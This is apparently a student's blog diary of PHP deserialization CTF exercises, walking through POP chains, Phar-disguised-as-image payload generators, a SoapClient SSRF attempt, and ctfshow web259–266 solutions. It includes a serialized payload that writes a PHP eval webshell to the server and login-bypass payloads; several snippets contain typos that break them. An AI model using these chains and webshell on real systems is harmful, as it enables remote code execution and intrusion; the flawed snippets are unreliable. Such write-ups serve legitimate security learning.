做题日记

web做题日记之反序列化喵

[TOC]

1.0喵喵喵

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
<?php
/**
 * 挑战目标:构造一个 POP 链,最终执行 system("whoami")
 * * 假设这是目标服务器上的源代码 (source.php)
 */

class Modifier {
    protected $var;

    public function __construct($var) {
        $this->var = $var;
    }

    // 提示:这是链条的起点吗?
    public function __destruct() {
        echo "清理 Modifier 对象...<br>";
        echo $this->var; 
    }
}

class Show {
    public $source;
    public $str;

    // 提示:当对象被当作字符串时触发
    public function __toString() {
        echo "触发了 Show 类的 toString...<br>";
        return $this->source->action();
    }
}

class Test {
    public $p;

    public function action() {
        echo "执行最终操作...<br>";
        system($this->p);
    }
}
?>
/**
 * 你的任务:
 * 在下方编写你的生成代码 (exp.php),生成一个恶意 Phar 文件
 * * 思考逻辑:
 * 1. Modifier 销毁时会 echo $this->var;
 * 2. 如果 $this->var 是一个 Show 对象,echo 它会触发什么?
 * 3. Show 对象触发后会调用 $this->source->action();
 * 4. 如果 $this->source 是一个 Test 对象,会发生什么?
 */

审计代码ing➡

三个类:Modifier、Show、Test

因为要执行system(“whoami”) ,那么Test类肯定是链条终点

Modifier为链条起点(存在__destruct()函数,因为__desatruct()函数可以自动运行),存在一个变量var,存在echo $this->var;

Show类中的__toString()函数需要当Show类里的变量被打印的时候才会触发,触发后会调用$this->source里的action()

要从Modifier到Test,那么中间量就是Show,即show为跳板

思路➡

先把$var赋值为一个Show里的对象,运行结束之后__desatruct()触发echo $this->var;

到Show类里去触发$this->source->action()

再事先将Show类里的$source赋值为Test的对象➡

最后转到Test运行system($this->p);

代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<?php
/**
 * 挑战目标:构造一个 POP 链,最终执行 system("whoami")
 * * 假设这是目标服务器上的源代码 (source.php)
 */

class Modifier {
    protected $var;

    public function __construct($var) {
        $this->var = $var;
    }

    // 提示:这是链条的起点吗?
    public function __destruct() {
        echo "清理 Modifier 对象...<br>";
        echo $this->var; 
    }
}

class Show {
    public $source;
    public $str;

    // 提示:当对象被当作字符串时触发
    public function __toString() {
        echo "触发了 Show 类的 toString...<br>";
        return $this->source->action();
    }
}

class Test {
    public $p;

    public function action() {
        echo "执行最终操作...<br>";
        system($this->p);
    }
}

$test = new Test();//创建一个Test类的对象test
$test-> = "whoami";//执行sysytem('whoami');

$show = new Show();
$show->source = $test;//间接执行了test变量的action()

$modifier = new Modifier($show);

@unlink("exp.phar");//unlink:删除已有文件
@unlink("exp.jpg");//@:没有文件就跳过,不需要报错

$phar = new Phar("exp.phar");//创建一个phar文件
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar->setMetaData($modifier);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
rename("exp.phar","exp.jpg");
?>

2.0喵喵喵喵

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<?php
/**
 * 挑战 02:四阶链条突破
 * 目标:执行 system("whoami")
 */

// --- 目标代码 (source.php) ---

class EasyStart {
    public $a;

    public function __destruct() {
        echo "[1] 启动 EasyStart...<br>";
        echo $this->a; // 触发点:把 $a 当字符串打印
    }
}

class MediumJump {
    public $b;

    public function __toString() {
        echo "[2] 进入 MediumJump...<br>";
        // 关键点:尝试访问 $b 里的 'secret' 属性
        // 如果 $b 对应的类里没有 'secret',会发生什么?
        return $this->b->secret; 
    }
}

class HardGet {
    public $c;

    // 当访问不存在的属性时触发
    public function __get($name) {
        echo "[3] 触发了 HardGet 的 __get,访问了:" . $name . "<br>";
        return $this->c->execute();
    }
}

class Sink {
    public $cmd;

    public function execute() {
        echo "[4] 最终终点站!执行命令...<br>";
        system($this->cmd);
    }
}

// --- 请在下方编写你的生成代码 (exp.php) ---

/**
 * 提示(倒推思路):
 * 1. 终点:Sink 类的 execute() 需要被执行。
 * 2. 谁能调 execute()?HardGet 的 __get。
 * 3. 谁能触发 __get?MediumJump 的 __toString 访问了一个不存在的 'secret'。
 * 4. 谁能触发 __toString?EasyStart 的 __destruct 执行了 echo。
 */
?>

继续审计X_X➡

四个类:EasyStart、MediumJump、HardGet、Sink

EasyStart类,看到__destruct()函数,作为POP链起点

要执行的system('whoami')出现在Sink类里,Sink作为链条终点

依旧将**$var变量设为MediumJump类的对象**,触发toString()

然后将$b设为HardGet的对象,因为HardGet里面根本没有$secret这个属性,所以会触发__get(),访问了$name这个变量。

所以我们再将$c这个变量设为Sink的对象,就把火引导了Sink里,最终执行whoami

接下来写代码➡

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<?php
/**
 * 挑战 02:四阶链条突破
 * 目标:执行 system("whoami")
 */

// --- 目标代码 (source.php) ---

class EasyStart {
    public $a;

    public function __destruct() {
        echo "[1] 启动 EasyStart...<br>";
        // 这里的 echo 是为了触发下一个类的 __toString
        echo $this->a; 
    }
}

class MediumJump {
    public $b;

    public function __toString() {
        echo "[2] 进入 MediumJump...<br>";
        // 关键点:尝试访问 $b 里的 'secret' 属性
        // 如果 $b 对应的类里没有 'secret',就会去敲 __get 的门
        return $this->b->secret; 
    }
}

class HardGet {
    public $c;

    // 当访问不存在的属性时触发,$name 会被赋值为 "secret"
    public function __get($name) {
        echo "[3] 触发了 HardGet 的 __get,访问了不存在的属性:" . $name . "<br>";
        // 这里的 $this->c 才是我们要套娃的地方
        return $this->c->execute();
    }
}

class Sink {
    public $cmd;

    public function execute() {
        echo "[4] 最终终点站!执行命令...<br>";
        system($this->cmd);
    }
}

$s = new Sink();
$s->cmd = "whoami";

$h = new HardGet();
$h->c = $s;

$m = new MediumJump();
$m->b = $h;

$e = new EasyStart();
$e->a = $m;

@unlink("exp.phar");
@unlink("exp.jpg");

$phar = new Phar("exp2.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar->setMetaData($e);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
rename("exp2.phar","exp2.jpg");

?>

3.0喵喵

题目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
class UserProfile {
    public $username;
    public $logger;
    public function __destruct() {
        // 触发点 1:访问不存在的属性
        if($this->username->vipStatus) {
            echo "欢迎 VIP 用户";
        }
    }
}

class Logger {
    public $handler;
    public function __get($prop) {
        echo "正在记录日志...属性名: " . $prop . "<br>";
        // 触发点 2:把对象当成函数调用
        $func = $this->handler;
        return $func();
    }
}

class Executor {
    public $code;
    public function __invoke() {
        echo "执行动态脚本...<br>";
        eval($this->code);
    }
}

// 漏洞触发口
$path = $_GET['path'];
// 模拟上传后的文件检查
if(isset($path) && !preg_match('/php/i', $path)) {
    is_file($path); // 这里会触发 Phar 反序列化吗?
}
?>

审计POP➡(微丝)

UserProfile为起点,Executor为终点执行eval函数,Logger为中间踏板

通过触发__get函数达到触发Executor__invoke来执行eval的目的

因此考虑将Executor对象设为Logger$this->handler

再将Logger 对象设为$this->username即可触发这段链条

再因为没有unserialize(),考虑phar反序列化

编写➡

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
class UserProfile{
    public $username;
    public $logger;
}
class Logger{
    public $handler;
}
class Execytor{
    public $code;
}
$exe = new Execytor();
$exe->code = "sysytem('whoami');";

$log = new Logger();
$log->handler = $exe;

$user = new UserProfile();
$user->username = $log;

@unlink("avatar.phar");
@unlink("avatar.jpg");

$puhar = new Phar("avatar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
$phar->setMetaData($user);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
rename("avatar.phar", "avatar.jpg");
?>

🤔,换汤不换药了说是……

本来是想找phar反序列化的题做做来着,也是没找到……😓,所以去做反序列化的题目了

4.0 ctfshow-web259

题目:

and

依旧审计ing➡

先看index.php:

直接对$vip变量进行反序列化,然后执行$vip->getFlag(),但是根本没有看到这个方法,

所以要去考虑PHP内置的类,即SoapClient,因为SoapClient里有一个函数叫__call,当调用类里不存在的方法就会触发

然后__call就会发送HTTP POST请求到指定的locationSSRF

再看flag.php:

首先检查了X-Forwarded-For

然后需要POST token=ctfshow

我们来编写一下代码➡

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
$target = "http://127.0.0.1/flag.php";

$headers = array(
    'X-Forwarded-For: 127.0.0.1, 127.0.0.1',
    'Content-Type: application/x-www-form-urlencoded'
);
$post_data = "token=ctfshow";
$user_agent = "ctfshow\r\n" . implode("\r\n", $headers) . "\r\nContent-Length: " . strlen($post_data) . "\r\n\r\n" . $post_data;
$client = new SoapClient(null, array(
    'uri' => 'http://127.0.0.1/',
    'location' => $target,
    'user_agent' => $user_agent
));
echo urlencode(serialize($client));
?>

好吧,做一半寄了,没学会SSRF,太坏了,这道题回头学完了SSRF补上X_X

5.0 ctfshow-web260

题目:

1
2
3
4
5
6
7
8
9
10
<?php

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
    echo $flag;
}

审计ing➡

GET传参并对其进行序列化,出现ctfshow_i_love_36D就给出flag

编写代码➡

好的,你是不是要编码写代码了,好的,你个傻蛋你上当了好的我要嘲笑你了)

只要参数中存在ctfshow_i_love_36D就行了(构造类也行其实…)

6.0 ctfshow-web261

题目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php

highlight_file(__FILE__);

class ctfshowvip{
    public $username;
    public $password;
    public $code;

    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __wakeup(){
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    public function __invoke(){
        eval($this->code);
    }

    public function __sleep(){
        $this->username='';
        $this->password='';
    }
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }
}

unserialize($_GET['vip']);

严肃审计➡

__wakeup()函数里面$username$password有一个不为空,就触发die

butbutbut,在 PHP 7.4+ 中,如果类中同时定义了 __unserialize__wakeup,反序列化时只会执行 __unserialize,而完全无视 __wakeup

然后捏,有一个弱比较,如果$code0x36d(十进制为877)相等,在__unserialize里,code被赋值为$username . $password

因此,如果我们将$username写为877.php,拼接后的字符串在进行弱比较时会强制转换为877,刚好相等

然后file_put_contents($this->username, $this->password)写入任意文件,我们考虑让 $this->username 变成文件名,再让 $this->password 变成一句话木马

严肃编写代码➡

绷不住了写不下去了,严肃昏迷

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
class ctfshowvip{
	public $username;
	public $password;
	public $code;
}
$obj = new ctfshowvip();
$obj->username = "877aa.php";
$obj->password = '<?php @eval($_POST[1]); ?>';
$payload = serialize($obj);
echo urlencode($payload);

?>

得到O%3A10%3A%22ctfshowvip%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A9%3A%22877aa.php%22%3Bs%3A8%3A%22password%22%3Bs%3A26%3A%22%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B+%3F%3E%22%3Bs%3A4%3A%22code%22%3BN%3B%7D

访问http://题目地址/index.php?vip=O%3A10%3A%22ctfshowvip%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A9%3A%22877aa.php%22%3Bs%3A8%3A%22password%22%3Bs%3A26%3A%22%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B+%3F%3E%22%3Bs%3A4%3A%22code%22%3BN%3B%7D,将恶意文件877aa.php写入(忘记截屏了,题目地址是啥忘了喵…)

没有报错就是成功了

再访问http://题目地址/877aa.php(因为一句话木马写在这里)

POST传参即可

这里先看的ls

然后找的根目录,最后得到flag

tac一下喵

7.0 cttfshow-web265

题目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}

$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());

if($ctfshow->login()){
    echo $flag;
}

审计一下➡

存在一个类:ctfshowAdmimn

要得到flag,就要使得$ctfshow->login()结果为True,即$token和$password强等于

从 URL 的 GET 参数 ctfshow 中读取字符串,并通过反序列化将其还原成一个 ctfshowAdmin 对象,但是存在$ctfshow->token=md5(mt_rand());使得$token完全随机

思路➡

考虑PHP引用,如果$password不是$token的副本,而是$token引用(&),那么$password$token绑定,MD5值相同

编写代码➡

1
2
3
4
5
6
7
8
9
10
11
12
<?php
class ctfshowAdmin {
	public $token;
	public $password;
}

$exp = new ctfshowAdmin();
$exp->password = &$exp->token;
$payload = serialize($exp);
echo urlencode($payload);
?>

序列化得到O%3A12%3A%22ctfshowAdmin%22%3A2%3A%7Bs%3A5%3A%22token%22%3BN%3Bs%3A8%3A%22password%22%3BR%3A2%3B%7D

然后GET传参得到flag

8.0 ctfshow-web266

题目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}

依旧审计➡

首先看见php://input,选择POST传参

还是强等于,这里没有随机了,所以直接让$username$password相等即可

只是多了一个对ctfshow的过滤,这里考虑大小写绕过,因为PHP类名不区分大小写

编写代码➡

1
2
3
4
5
6
7
8
9
10
<?php
class CTFSHOW {
	public $username = 'admin';
	public $password = 'admin';
}
$cs = new CTFSHOW();
$payload = serialize($cs);
echo ($payload);

?>

得到payload

O:7:"CTFSHOW":2:{s:8:"username";s:5:"admin";s:8:"password";s:5:"admin";}

直接hackbar post进去就可以(阿巴阿巴……不知道为什么出不来flag,可恶喵,步骤是没有问题的…)

Leave a comment

valine